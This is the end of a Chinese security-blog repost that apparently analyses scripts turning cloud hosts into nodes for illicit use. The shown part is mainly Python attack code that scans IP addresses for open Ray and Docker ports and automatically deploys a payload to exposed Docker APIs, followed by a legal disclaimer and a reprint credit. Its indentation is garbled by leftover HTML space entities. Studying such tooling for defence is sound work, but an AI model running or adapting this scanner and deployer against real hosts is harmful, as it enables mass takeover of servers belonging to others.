&nbsp;&nbsp;for&nbsp;port&nbsp;in&nbsp;RAY_PORTS:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;check_port(ip, port):&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; found.append((ip, port,&nbsp;"ray"))&nbsp; &nbsp;&nbsp;for&nbsp;ip, port, kind&nbsp;in&nbsp;found:&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;kind ==&nbsp;"docker":&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; deploy_to_docker(ip, port, use_boring=use_boring)

def&nbsp;main():&nbsp; &nbsp;&nbsp;import&nbsp;sys&nbsp; &nbsp; use_boring =&nbsp;"--boring"&nbsp;in&nbsp;sys.argv&nbsp; &nbsp; scan_and_deploy(use_boring=use_boring)

if&nbsp;__name__ ==&nbsp;"__main__":&nbsp; &nbsp; main()

#

(全文完)


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:二进制空间安全 suntiger suntiger《云主机自动沦陷成为黑产节点,黑客利用5个脚本全自动实现》

评论:0   参与:  0